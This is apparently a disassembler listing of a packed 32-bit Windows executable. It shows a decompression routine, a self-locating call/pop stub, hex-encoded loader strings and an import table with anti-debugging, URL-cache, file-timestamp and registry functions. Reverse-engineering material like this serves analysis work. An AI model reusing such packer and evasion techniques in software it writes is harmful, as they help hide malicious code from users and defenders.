loc_44A85A: ; CODE XREF: sub_44A6ED+130�j
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
add esp, 98h
retn 4
sub_44A6ED endp
; =============== S U B R O U T I N E =======================================
sub_44A869 proc near ; CODE XREF: sub_44AA1C+64�p
; sub_44ABC0+28�p ...
var_4 = dword ptr -4
push ecx
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi]
cmp dword ptr [eax+4], 8
jb short loc_44A8A7
loc_44A877: ; CODE XREF: sub_44A869+3C�j
mov ecx, [eax]
mov dl, [ecx]
inc ecx
mov byte ptr [esp+10h+var_4], dl
mov [eax], ecx
mov ecx, [eax+8]
mov edx, [esp+10h+var_4]
shl ecx, 8
and edx, 0FFh
or ecx, edx
mov edx, [eax+4]
add edx, 0FFFFFFF8h
mov [eax+8], ecx
mov ecx, edx
mov [eax+4], edx
cmp ecx, 8
jnb short loc_44A877
loc_44A8A7: ; CODE XREF: sub_44A869+C�j
mov edx, [eax+4]
mov eax, [eax+8]
mov ecx, 8
sub ecx, edx
shr eax, cl
mov ecx, [esi+24h]
and eax, 0FFFE00h
cmp eax, ecx
jnb short loc_44A8D6
mov edx, [esi+8Ch]
mov ecx, eax
shr ecx, 10h
xor ebx, ebx
mov bl, [ecx+edx]
mov edx, ebx
jmp short loc_44A911
; ---------------------------------------------------------------------------
loc_44A8D6: ; CODE XREF: sub_44A869+57�j
cmp eax, [esi+2Ch]
jnb short loc_44A8E5
cmp eax, [esi+28h]
sbb edx, edx
add edx, 0Ah
jmp short loc_44A911
; ---------------------------------------------------------------------------
loc_44A8E5: ; CODE XREF: sub_44A869+70�j
cmp eax, [esi+30h]
jnb short loc_44A8F1
mov edx, 0Bh
jmp short loc_44A911
; ---------------------------------------------------------------------------
loc_44A8F1: ; CODE XREF: sub_44A869+7F�j
cmp eax, [esi+34h]
jnb short loc_44A8FD
mov edx, 0Ch
jmp short loc_44A911
; ---------------------------------------------------------------------------
loc_44A8FD: ; CODE XREF: sub_44A869+8B�j
cmp eax, [esi+38h]
jnb short loc_44A909
mov edx, 0Dh
jmp short loc_44A911
; ---------------------------------------------------------------------------
loc_44A909: ; CODE XREF: sub_44A869+97�j
cmp eax, [esi+3Ch]
sbb edx, edx
add edx, 0Fh
loc_44A911: ; CODE XREF: sub_44A869+6B�j
; sub_44A869+7A�j ...
mov ecx, [esi]
mov edi, [ecx+4]
add edi, edx
mov [ecx+4], edi
mov ebx, [esi+edx*4]
mov ecx, 18h
sub eax, ebx
sub ecx, edx
pop edi
shr eax, cl
mov ecx, [esi+edx*4+44h]
add eax, ecx
mov ecx, [esi+88h]
pop esi
pop ebx
mov eax, [ecx+eax*4]
pop ecx
retn
sub_44A869 endp
; =============== S U B R O U T I N E =======================================
sub_44A93D proc near ; CODE XREF: .text:0044A590�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
mov edi, ecx
xor edx, edx
xor eax, eax
lea esi, [edi+268h]
loc_44A94C: ; CODE XREF: sub_44A93D+2F�j
mov [esi], edx
push esi
call sub_44ABB2
mov cl, [eax+esi+443FC7h]
pop esi
mov ebx, 1
add esi, 4
shl ebx, cl
add edx, ebx
inc eax
cmp eax, 3Ah
jb short loc_44A94C
mov eax, [esp+0Ch+arg_0]
lea ecx, [edi+10h]
push eax
push 2D1h
call sub_44A6C8
push eax
push 1Ch
lea ecx, [edi+0A0h]
call sub_44A6C8
push eax
push 8
lea ecx, [edi+130h]
call sub_44A6C8
push eax
push 13h
lea ecx, [edi+1C0h]
call sub_44A6C8
mov [edi+260h], eax
pop edi
pop esi
add eax, 2F5h
pop ebx
retn 4
sub_44A93D endp
; =============== S U B R O U T I N E =======================================
sub_44A9BB proc near ; CODE XREF: .text:0044A5A9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, ecx
mov ecx, [esp+arg_0]
push edi
mov [edx], eax
lea eax, [edx+4]
mov [eax], ecx
mov dword ptr [eax+4], 20h
mov [edx+10h], eax
mov [edx+0A0h], eax
mov [edx+130h], eax
mov [edx+1C0h], eax
xor eax, eax
mov ecx, 0BDh
mov [edx+250h], eax
mov [edx+254h], eax
mov [edx+258h], eax
mov edi, [edx+260h]
mov [edx+25Ch], eax
rep stosd
mov ecx, edx
stosb
call sub_44AA1C
pop edi
retn 8
sub_44A9BB endp
; =============== S U B R O U T I N E =======================================
sub_44AA1C proc near ; CODE XREF: sub_44A9BB+58�p
; sub_44ABC0+267�p
var_30C = byte ptr -30Ch
var_2F9 = byte ptr -2F9h
var_2F8 = byte ptr -2F8h
var_27 = byte ptr -27h
var_B = byte ptr -0Bh
sub esp, 30Ch
push ebx
mov ebx, ecx
push ebp
push esi
lea ebp, [ebx+4]
push edi
push 1
mov ecx, ebp
call sub_44A65D
test eax, eax
jnz short loc_44AA46
mov edi, [ebx+260h]
mov ecx, 0BDh
rep stosd
stosb
loc_44AA46: ; CODE XREF: sub_44AA1C+1A�j
xor esi, esi
loc_44AA48: ; CODE XREF: sub_44AA1C+3D�j
push 4
mov ecx, ebp
call sub_44A65D
mov [esp+esi+31Ch+var_30C], al
inc esi
cmp esi, 13h
jb short loc_44AA48
lea edi, [ebx+1C0h]
lea eax, [esp+31Ch+var_30C]
push eax
mov ecx, edi
call sub_44A6ED
test al, al
jnz short loc_44AA7C
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_44AA7C: ; CODE XREF: sub_44AA1C+53�j
xor esi, esi
loc_44AA7E: ; CODE XREF: sub_44AA1C+E9�j
mov ecx, edi
call sub_44A869
cmp eax, 10h
jnb short loc_44AA9F
mov ecx, [ebx+260h]
mov dl, [ecx+esi]
add dl, al
and dl, 0Fh
mov [esp+esi+31Ch+var_2F8], dl
inc esi
jmp short loc_44AAFF
; ---------------------------------------------------------------------------
loc_44AA9F: ; CODE XREF: sub_44AA1C+6C�j
jnz short loc_44AAC9
push 2
mov ecx, ebp
call sub_44A65D
add eax, 3
test eax, eax
jle short loc_44AAFF
loc_44AAB1: ; CODE XREF: sub_44AA1C+A9�j
cmp esi, 2F5h
jge short loc_44AB0B
mov cl, [esp+esi+31Ch+var_2F9]
dec eax
mov [esp+esi+31Ch+var_2F8], cl
inc esi
test eax, eax
jg short loc_44AAB1
jmp short loc_44AAFF
; ---------------------------------------------------------------------------
loc_44AAC9: ; CODE XREF: sub_44AA1C:loc_44AA9F�j
cmp eax, 11h
jnz short loc_44AADC
push 3
mov ecx, ebp
call sub_44A65D
add eax, 3
jmp short loc_44AAE8
; ---------------------------------------------------------------------------
loc_44AADC: ; CODE XREF: sub_44AA1C+B0�j
push 7
mov ecx, ebp
call sub_44A65D
add eax, 0Bh
loc_44AAE8: ; CODE XREF: sub_44AA1C+BE�j
test eax, eax
jle short loc_44AAFF
loc_44AAEC: ; CODE XREF: sub_44AA1C+E1�j
cmp esi, 2F5h
jge short loc_44AB0B
mov [esp+esi+31Ch+var_2F8], 0
inc esi
dec eax
test eax, eax
jg short loc_44AAEC
loc_44AAFF: ; CODE XREF: sub_44AA1C+81�j
; sub_44AA1C+93�j ...
cmp esi, 2F5h
jl loc_44AA7E
loc_44AB0B: ; CODE XREF: sub_44AA1C+9B�j
; sub_44AA1C+D6�j
lea edx, [esp+31Ch+var_2F8]
lea ecx, [ebx+10h]
push edx
call sub_44A6ED
test al, al
jnz short loc_44AB27
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_44AB27: ; CODE XREF: sub_44AA1C+FE�j
lea eax, [esp+31Ch+var_27]
lea ecx, [ebx+0A0h]
push eax
call sub_44A6ED
test al, al
jnz short loc_44AB49
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_44AB49: ; CODE XREF: sub_44AA1C+120�j
lea ecx, [esp+31Ch+var_B]
push ecx
lea ecx, [ebx+130h]
call sub_44A6ED
test al, al
jnz short loc_44AB6B
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_44AB6B: ; CODE XREF: sub_44AA1C+142�j
mov byte ptr [ebx+264h], 0
xor eax, eax
loc_44AB74: ; CODE XREF: sub_44AA1C+166�j
cmp [esp+eax+31Ch+var_B], 3
jnz short loc_44AB86
inc eax
cmp eax, 8
jb short loc_44AB74
jmp short loc_44AB8D
; ---------------------------------------------------------------------------
loc_44AB86: ; CODE XREF: sub_44AA1C+160�j
mov byte ptr [ebx+264h], 1
loc_44AB8D: ; CODE XREF: sub_44AA1C+168�j
mov eax, [ebx+260h]
lea ecx, [esp+31Ch+var_2F8]
mov esi, 2F5h
loc_44AB9C: ; CODE XREF: sub_44AA1C+187�j
mov dl, [ecx]
mov [eax], dl
inc eax
inc ecx
dec esi
jnz short loc_44AB9C
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
add esp, 30Ch
retn
sub_44AA1C endp
; =============== S U B R O U T I N E =======================================
sub_44ABB2 proc near ; CODE XREF: sub_44A93D+12�p
; sub_44ABC0+80�p ...
call sub_44ABB8
nop
sub_44ABB2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44ABB8 proc near ; CODE XREF: sub_44ABB2�p
pop esi
sub esi, 44455Bh
retn
sub_44ABB8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44ABC0 proc near ; CODE XREF: .text:0044A5CC�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 14h
mov eax, [esp+14h+arg_4]
push ebx
push ebp
push esi
mov dword ptr [eax], 0
mov eax, [esp+20h+arg_0]
push edi
xor edi, edi
test eax, eax
mov esi, ecx
mov [esp+24h+var_14], edi
jbe loc_44AE40
loc_44ABE5: ; CODE XREF: sub_44ABC0+274�j
lea ecx, [esi+10h]
call sub_44A869
cmp eax, 100h
jnb short loc_44AC07
mov ecx, [esi]
mov [ecx], al
mov ecx, [esi]
inc ecx
inc edi
mov [esi], ecx
mov [esp+24h+var_14], edi
jmp loc_44AE30
; ---------------------------------------------------------------------------
loc_44AC07: ; CODE XREF: sub_44ABC0+32�j
cmp eax, 2D0h
jnb loc_44AE25
add eax, 0FFFFFF00h
mov ebp, eax
and eax, 7
shr ebp, 3
lea edx, [eax+2]
cmp eax, 7
mov [esp+24h+var_10], edx
jnz loc_44ACC3
lea ecx, [esi+0A0h]
call sub_44A869
mov ecx, [esi+8]
xor ebx, ebx
push esi
call sub_44ABB2
mov bl, [eax+esi+443FABh]
pop esi
cmp ecx, 8
jb short loc_44AC84
loc_44AC52: ; CODE XREF: sub_44ABC0+C2�j
mov ecx, [esi+4]
mov dl, [ecx]
inc ecx
mov byte ptr [esp+24h+var_C], dl
mov [esi+4], ecx
mov ecx, [esi+0Ch]
mov edx, [esp+24h+var_C]
shl ecx, 8
and edx, 0FFh
or ecx, edx
mov edx, [esi+8]
add edx, 0FFFFFFF8h
mov [esi+0Ch], ecx
mov ecx, edx
mov [esi+8], edx
cmp ecx, 8
jnb short loc_44AC52
loc_44AC84: ; CODE XREF: sub_44ABC0+90�j
mov edi, [esi+8]
mov edx, [esi+0Ch]
mov ecx, 8
sub ecx, edi
add edi, ebx
shr edx, cl
mov ecx, 18h
mov [esi+8], edi
sub ecx, ebx
and edx, 0FFFFFFh
shr edx, cl
xor ecx, ecx
push esi
call sub_44ABB2
mov cl, [eax+esi+443F8Fh]
pop esi
mov eax, [esp+24h+var_10]
add ecx, edx
add eax, ecx
mov [esp+24h+var_10], eax
loc_44ACC3: ; CODE XREF: sub_44ABC0+69�j
mov al, [esi+264h]
mov ebx, [esi+ebp*4+268h]
xor edx, edx
push esi
call sub_44ABB2
mov dl, [ebp+esi+443FC7h]
pop esi
test al, al
mov edi, edx
jz short loc_44AD5C
cmp edi, 3
jb short loc_44AD5C
mov eax, [esi+8]
lea ebp, [edi-3]
cmp eax, 8
jb short loc_44AD27
loc_44ACF6: ; CODE XREF: sub_44ABC0+165�j
mov eax, [esi+4]
mov edx, [esi+0Ch]
shl edx, 8
mov cl, [eax]
inc eax
mov byte ptr [esp+24h+var_8], cl
mov ecx, [esi+8]
mov [esi+4], eax
mov eax, [esp+24h+var_8]
and eax, 0FFh
add ecx, 0FFFFFFF8h
or edx, eax
mov eax, ecx
cmp eax, 8
mov [esi+0Ch], edx
mov [esi+8], ecx
jnb short loc_44ACF6
loc_44AD27: ; CODE XREF: sub_44ABC0+134�j
mov eax, [esi+8]
mov edi, [esi+0Ch]
mov ecx, 8
sub ecx, eax
add eax, ebp
shr edi, cl
mov ecx, 18h
mov [esi+8], eax
sub ecx, ebp
and edi, 0FFFFFFh
shr edi, cl
lea ecx, [esi+130h]
call sub_44A869
add eax, ebx
lea ebx, [eax+edi*8]
jmp short loc_44ADB7
; ---------------------------------------------------------------------------
loc_44AD5C: ; CODE XREF: sub_44ABC0+124�j
; sub_44ABC0+129�j
cmp dword ptr [esi+8], 8
jb short loc_44AD93
loc_44AD62: ; CODE XREF: sub_44ABC0+1D1�j
mov eax, [esi+4]
mov edx, [esi+0Ch]
shl edx, 8
mov cl, [eax]
inc eax
mov byte ptr [esp+24h+var_4], cl
mov ecx, [esi+8]
mov [esi+4], eax
mov eax, [esp+24h+var_4]
and eax, 0FFh
add ecx, 0FFFFFFF8h
or edx, eax
mov eax, ecx
cmp eax, 8
mov [esi+0Ch], edx
mov [esi+8], ecx
jnb short loc_44AD62
loc_44AD93: ; CODE XREF: sub_44ABC0+1A0�j
mov edx, [esi+8]
mov eax, [esi+0Ch]
mov ecx, 8
sub ecx, edx
add edx, edi
shr eax, cl
mov ecx, 18h
mov [esi+8], edx
sub ecx, edi
and eax, 0FFFFFFh
shr eax, cl
add ebx, eax
loc_44ADB7: ; CODE XREF: sub_44ABC0+19A�j
cmp ebx, 3
jnb short loc_44ADD6
mov ecx, [esi+ebx*4+250h]
test ebx, ebx
jz short loc_44ADF7
mov edx, [esi+250h]
mov [esi+ebx*4+250h], edx
jmp short loc_44ADF1
; ---------------------------------------------------------------------------
loc_44ADD6: ; CODE XREF: sub_44ABC0+1FA�j
mov eax, [esi+254h]
mov edx, [esi+250h]
lea ecx, [ebx-3]
mov [esi+258h], eax
mov [esi+254h], edx
loc_44ADF1: ; CODE XREF: sub_44ABC0+214�j
mov [esi+250h], ecx
loc_44ADF7: ; CODE XREF: sub_44ABC0+205�j
mov eax, [esi]
mov edi, [esp+24h+var_10]
inc ecx
lea edx, [eax+edi]
cmp eax, edx
mov [esi], edx
jnb short loc_44AE17
loc_44AE07: ; CODE XREF: sub_44ABC0+255�j
mov edx, eax
sub edx, ecx
inc eax
mov dl, [edx]
mov [eax-1], dl
mov edx, [esi]
cmp eax, edx
jb short loc_44AE07
loc_44AE17: ; CODE XREF: sub_44ABC0+245�j
mov eax, [esp+24h+var_14]
add eax, edi
mov [esp+24h+var_14], eax
mov edi, eax
jmp short loc_44AE30
; ---------------------------------------------------------------------------
loc_44AE25: ; CODE XREF: sub_44ABC0+4C�j
mov ecx, esi
call sub_44AA1C
test al, al
jz short loc_44AE4C
loc_44AE30: ; CODE XREF: sub_44ABC0+42�j
; sub_44ABC0+263�j
cmp edi, [esp+24h+arg_0]
jb loc_44ABE5
mov eax, [esp+24h+arg_4]
mov [eax], edi
loc_44AE40: ; CODE XREF: sub_44ABC0+1F�j
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
add esp, 14h
retn 8
; ---------------------------------------------------------------------------
loc_44AE4C: ; CODE XREF: sub_44ABC0+26E�j
pop edi
pop esi
pop ebp
xor al, al
pop ebx
add esp, 14h
retn 8
sub_44ABC0 endp
; ---------------------------------------------------------------------------
dd 0
dd 8, 400000h, 7C800000h, 6E72656Bh, 32336C65h, 6C6C642Eh
dd 72695600h, 6C617574h, 6F6C6C41h, 69560063h, 61757472h
dd 6572466Ch, 69560065h, 61757472h, 6F72506Ch, 74636574h
dd 69784500h, 6F725074h, 73736563h, 0
dd 65737500h, 2E323372h, 6C6C64h, 7373654Dh, 42656761h
dd 41786Fh, 72707377h, 66746E69h, 4F4C0041h, 52454441h
dd 52524520h, 5400524Fh, 70206568h, 65636F72h, 65727564h
dd 746E6520h, 70207972h, 746E696Fh, 20732520h, 6C756F63h
dd 6F6E2064h, 65622074h, 636F6C20h, 64657461h, 206E6920h
dd 20656874h, 616E7964h, 2063696Dh, 6B6E696Ch, 62696C20h
dd 79726172h, 732520h, 20656854h, 6964726Fh, 206C616Eh
dd 63207525h, 646C756Fh, 746F6E20h, 20656220h, 61636F6Ch
dd 20646574h, 74206E69h, 64206568h, 6D616E79h, 6C206369h
dd 206B6E69h, 7262696Ch, 20797261h, 90007325h, 7C80AC28h
dd 7C80B529h, 7C801D77h, 0
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 47000000h, 72507465h
dd 6441636Fh, 73657264h, 73h, 4D746547h, 6C75646Fh, 6E614865h
dd 41656C64h, 4C000000h, 4C64616Fh, 61726269h, 417972h
dd 3 dup(0)
dd 4AF80h, 4AF70h, 3 dup(0)
dd 4B074h, 4B0C4h, 3 dup(0)
dd 4B081h, 4B0CCh, 3 dup(0)
dd 4B08Dh, 4B0D4h, 3 dup(0)
dd 4B097h, 4B0DCh, 3 dup(0)
dd 4B0A2h, 4B0E4h, 3 dup(0)
dd 4B0ACh, 4B0ECh, 3 dup(0)
dd 4B0B9h, 4B0F4h, 5 dup(0)
dd 61656C6Fh, 32337475h, 6C6C642Eh, 6E697700h, 74656E69h
dd 6C6C642Eh, 656C6F00h, 642E3233h, 75006C6Ch, 33726573h
dd 6C642E32h, 6467006Ch, 2E323369h, 6C6C64h, 61766461h
dd 32336970h, 6C6C642Eh, 74726300h, 2E6C6C64h, 6C6C64h
dd 77124BC2h, 0
dd 771B6E85h, 0
dd 77526009h, 0
dd 77D4E34Bh, 0
dd 77F15FF1h, 0
dd 77DD7753h, 0
; ---------------------------------------------------------------------------
jmp short loc_44B165
; ---------------------------------------------------------------------------
dw 73D9h
dd 0
db 0
align 2
aSysallocstring db 'SysAllocString',0
db 2 dup(0), 46h
aIndfirsturlcac db 'indFirstUrlCacheEntryA',0
align 4
dd 436F4300h, 74616572h, 736E4965h, 636E6174h, 65h, 6C6C6143h
dd 646E6957h, 7250776Fh, 41636Fh, 65470000h, 6F745374h
dd 624F6B63h, 7463656Ah, 4F000000h, 506E6570h
db 72h
; ---------------------------------------------------------------------------
loc_44B165: ; CODE XREF: .text:0044B0F4�j
outsd
arpl [ebp+73h], sp
jnb short near ptr byte_44B1BF
outsd
imul esp, [ebp+6Eh], 0
; ---------------------------------------------------------------------------
dd 695F0000h, 616F74h, 11h dup(0)
db 3 dup(0)
byte_44B1BF db 0 ; CODE XREF: .text:0044B169�j
dd 10h dup(0)
dd 780h dup(?)
_text ends
; Section 2. (virtual address 0004D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0004A600
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_idata segment para public 'CODE' use32
assume cs:_idata
;org 44D000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 4D0B4h, 2 dup(0)
db 0CCh
db 0D2h, 4, 0
dd 48340h, 4D0BCh, 2 dup(0)
dd 4D2ECh, 4834Ch, 4D0C8h, 2 dup(0)
dd 4D32Ch, 4835Ch, 4D0DCh, 2 dup(0)
dd 4D37Eh, 48374h, 4D1B8h, 2 dup(0)
dd 4D710h, 48454h, 4D230h, 2 dup(0)
dd 4D8F4h, 484D0h, 4D248h, 2 dup(0)
dd 4D952h, 484ECh, 4D280h, 2 dup(0)
dd 4DA64h, 48528h, 5 dup(0)
dd 4D2DAh, 0
dd 4D2F8h, 4D312h, 0
dd 4D336h, 4D34Ah, 4D35Ch, 4D36Ch, 0
dd 4D38Ch, 4D39Ah, 4D3A8h, 4D3C4h, 4D3D6h, 4D3ECh, 4D402h
dd 4D410h, 4D41Eh, 4D42Eh, 4D444h, 4D458h, 4D46Ah, 4D47Ch
dd 4D492h, 4D4A0h, 4D4B0h, 4D4C0h, 4D4CEh, 4D4DEh, 4D4F6h
dd 4D50Eh, 4D520h, 4D534h, 4D546h, 4D55Ch, 4D574h, 4D584h
dd 4D594h, 4D5A8h, 4D5B8h, 4D5C4h, 4D5D2h, 4D5DEh, 4D5ECh
dd 4D5FAh, 4D606h, 4D612h, 4D622h, 4D630h, 4D642h, 4D650h
dd 4D658h, 4D66Ch, 4D67Ch, 4D68Ah, 4D69Ah, 4D6B0h, 4D6BAh
dd 4D6C6h, 4D6D6h, 4D6E2h, 4D6EEh, 4D700h, 0
dd 4D71Ch, 4D72Eh, 4D740h, 4D750h, 4D75Eh, 4D76Ah, 4D77Ah
dd 4D786h, 4D79Ch, 4D7AAh, 4D7B6h, 4D7C2h, 4D7D0h, 4D7DEh
dd 4D7F0h, 4D802h, 4D814h, 4D828h, 4D83Ch, 4D850h, 4D864h
dd 4D870h, 4D880h, 4D892h, 4D8A4h, 4D8B2h, 4D8C4h, 4D8D4h
dd 4D8E2h, 0
dd 4D8FEh, 4D910h, 4D91Eh, 4D92Eh, 4D944h, 0
dd 4D960h, 4D974h, 4D98Ah, 4D99Ch, 4D9AAh, 4D9BAh, 4D9CEh
dd 4D9E0h, 4D9F2h, 4DA04h, 4DA18h, 4DA34h, 4DA4Ah, 0
dd 4DA70h, 4DA78h, 4DA88h, 4DA92h, 4DA9Eh, 4DAA4h, 4DAACh
dd 4DAB6h, 4DAC0h, 4DACAh, 4DAD2h, 4DADAh, 4DAE4h, 4DAEEh
dd 4DAF6h, 4DB00h, 4DB0Ah, 4DB14h, 0
dd 61656C6Fh, 32337475h, 6C6C642Eh, 0
aSysallocstri_0 db 'SysAllocString',0
align 4
aWininet_dll db 'wininet.dll',0
dd 69460000h, 6946646Eh, 55747372h, 61436C72h, 45656863h
dd 7972746Eh, 41h, 646E6946h, 7478654Eh, 436C7255h, 65686361h
dd 72746E45h, 4179h, 33656C6Fh, 6C642E32h, 6Ch, 72436F43h
dd 65746165h, 74736E49h, 65636E61h, 0
aClsidfromstrin db 'CLSIDFromString',0
dd 6F430000h, 74696E49h, 696C6169h, 657Ah, 6F430000h, 6E696E55h
dd 61697469h, 657A696Ch, 656B0000h, 6C656E72h, 642E3233h
dd 6C6Ch, 65440000h, 6574656Ch, 656C6946h, 41h, 74697845h
dd 636F7250h, 737365h, 78450000h, 646E6170h, 69766E45h
dd 6D6E6F72h, 53746E65h, 6E697274h, 417367h, 65470000h
dd 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 43746547h, 65727275h
dd 7250746Eh, 7365636Fh, 644973h, 65470000h, 72754374h
dd 746E6572h, 65726854h, 64496461h, 0
aGetfilesize db 'GetFileSize',0
dd 65470000h, 6C694674h, 6D695465h, 65h, 4C746547h, 45747361h
dd 726F7272h, 0
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 0
aGetprocessheap db 'GetProcessHeap',0
align 4
dd 65470000h, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 736F6C43h, 6E614865h, 656C64h, 65470000h, 6D655474h
dd 74615070h, 4168h, 65470000h, 63695474h, 756F436Bh, 746Eh
dd 65470000h, 72655674h, 6E6F6973h, 0
aGetversionexa db 'GetVersionExA',0
align 10h
aGetvolumeinfor db 'GetVolumeInformationA',0
align 4
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 10h
aGlobaladdatoma db 'GlobalAddAtomA',0
align 10h
dd 6C470000h, 6C61626Fh, 656C6544h, 74416574h, 6D6Fh, 6C470000h
dd 6C61626Fh, 646E6946h, 6D6F7441h, 41h, 626F6C47h, 654D6C61h
dd 79726F6Dh, 74617453h, 7375h, 6E490000h, 6C726574h, 656B636Fh
dd 636E4964h, 656D6572h, 746Eh, 73490000h, 52646142h, 50646165h
dd 7274h, 73490000h, 57646142h, 65746972h, 727450h, 73490000h
dd 75626544h, 72656767h, 73657250h, 746E65h, 6F4C0000h
dd 694C6461h, 72617262h, 4179h, 6F430000h, 69467970h, 41656Ch
dd 6F4C0000h, 416C6163h, 636F6C6Ch, 0
aLocalfree db 'LocalFree',0
align 10h
aOpenmutexa db 'OpenMutexA',0
align 4
dd 704F0000h, 72506E65h, 7365636Fh, 73h, 64616552h, 656C6946h
dd 0
aRtlunwind db 'RtlUnwind',0
align 4
aRtlzeromemory db 'RtlZeroMemory',0
align 4
aCreatefilea db 'CreateFileA',0
dd 65530000h, 6C694674h, 696F5065h, 7265746Eh, 0
aSetfiletime db 'SetFileTime',0
dd 6C530000h, 706565h, 65540000h, 6E696D72h, 50657461h
dd 65636F72h, 7373h, 69560000h, 61757472h, 6C6C416Ch, 636Fh
dd 69560000h, 61757472h, 6572466Ch, 65h, 74726956h, 516C6175h
dd 79726575h, 0
aWidechartomult db 'WideCharToMultiByte',0
dd 69570000h, 6578456Eh, 63h, 74697257h, 6C694665h, 65h
dd 61657243h, 754D6574h, 41786574h, 0
aLstrlena db 'lstrlenA',0
align 4
aLstrlenw db 'lstrlenW',0
align 10h
aCreateprocessa db 'CreateProcessA',0
align 10h
dd 72430000h, 65746165h, 65726854h, 6461h, 72657375h, 642E3233h
dd 6C6Ch, 61430000h, 69576C6Ch, 776F646Eh, 636F7250h, 41h
dd 57746547h, 6F646E69h, 78655477h, 4174h, 65470000h, 6E695774h
dd 52776F64h, 746365h, 69460000h, 6957646Eh, 776F646Eh
dd 41h, 57746547h, 6F646E69h, 77h, 43746547h, 7373616Ch
dd 656D614Eh, 41h, 46746553h, 7375636Fh, 0
aGetforegroundw db 'GetForegroundWindow',0
dd 6F4C0000h, 75436461h, 726F7372h, 41h, 54746553h, 72656D69h
dd 0
aLoadicona db 'LoadIconA',0
align 4
aMessageboxa db 'MessageBoxA',0
dd 65470000h, 73654D74h, 65676173h, 41h, 57746547h, 6F646E69h
dd 6E6F4C77h, 4167h, 65530000h, 6E695774h, 4C776F64h, 41676E6Fh
dd 0
aCreatedesktopa db 'CreateDesktopA',0
align 4
dd 65530000h, 72685474h, 44646165h, 746B7365h, 706Fh, 65470000h
dd 72685474h, 44646165h, 746B7365h, 706Fh, 72540000h, 6C736E61h
dd 4D657461h, 61737365h, 6567h, 69440000h, 74617073h, 654D6863h
dd 67617373h, 4165h, 73770000h, 6E697270h, 416674h, 65530000h
dd 654D646Eh, 67617373h, 4165h, 65520000h, 74736967h, 6C437265h
dd 41737361h, 0
aPostquitmessag db 'PostQuitMessage',0
dd 68530000h, 6957776Fh, 776F646Eh, 0
aCreatewindowex db 'CreateWindowExA',0
dd 65440000h, 6F727473h, 6E695779h, 776F64h, 6F4D0000h
dd 69576576h, 776F646Eh, 0
aDefwindowproca db 'DefWindowProcA',0
align 4
aGdi32_dll db 'gdi32.dll',0
align 10h
aGetstockobject db 'GetStockObject',0
align 10h
dd 65530000h, 436B4274h, 726F6C6Fh, 0
aSettextcolor db 'SetTextColor',0
align 10h
aCreatebrushind db 'CreateBrushIndirect',0
dd 72430000h, 65746165h, 746E6F46h, 64610041h, 69706176h
dd 642E3233h, 6C6Ch, 704F0000h, 72506E65h, 7365636Fh, 6B6F5473h
dd 6E65h, 65470000h, 6B6F5474h, 6E496E65h, 6D726F66h, 6F697461h
dd 6Eh, 43676552h, 74616572h, 79654B65h, 417845h, 65520000h
dd 6F6C4367h, 654B6573h, 79h, 4F676552h, 4B6E6570h, 78457965h
dd 41h, 51676552h, 79726575h, 756C6156h, 41784565h, 0
aRegsetvalueexa db 'RegSetValueExA',0
align 10h
dd 65470000h, 63655374h, 74697275h, 666E4979h, 6Fh, 53746553h
dd 72756365h, 49797469h, 6F666Eh, 65530000h, 746E4574h
dd 73656972h, 63416E49h, 416Ch, 65470000h, 64695374h, 6E656449h
dd 69666974h, 75417265h, 726F6874h, 797469h, 65470000h
dd 64695374h, 41627553h, 6F687475h, 79746972h, 0
aGetsidsubautho db 'GetSidSubAuthorityCount',0
aCrtdll_dll db 'crtdll.dll',0
align 10h
dd 695F0000h, 616F74h, 5F5F0000h, 4D746547h, 416E6961h
dd 736772h, 735F0000h, 7065656Ch, 0
a_stricmp db '_stricmp',0
align 10h
aAbs db 'abs',0
dd 78650000h, 7469h, 656D0000h, 706D636Dh, 0
aMemcpy db 'memcpy',0
align 10h
dd 656D0000h, 7465736Dh, 0
aRaise db 'raise',0
align 4
aRand db 'rand',0
align 4
aSignal db 'signal',0
align 4
dd 70730000h, 746E6972h, 66h, 6E617273h, 64h, 61637373h
dd 666Eh, 74730000h, 74616372h, 0
aStrchr db 'strchr',0
align 4
dd 74730000h, 6D636E72h, 70h, 138h dup(0)
_idata ends
end start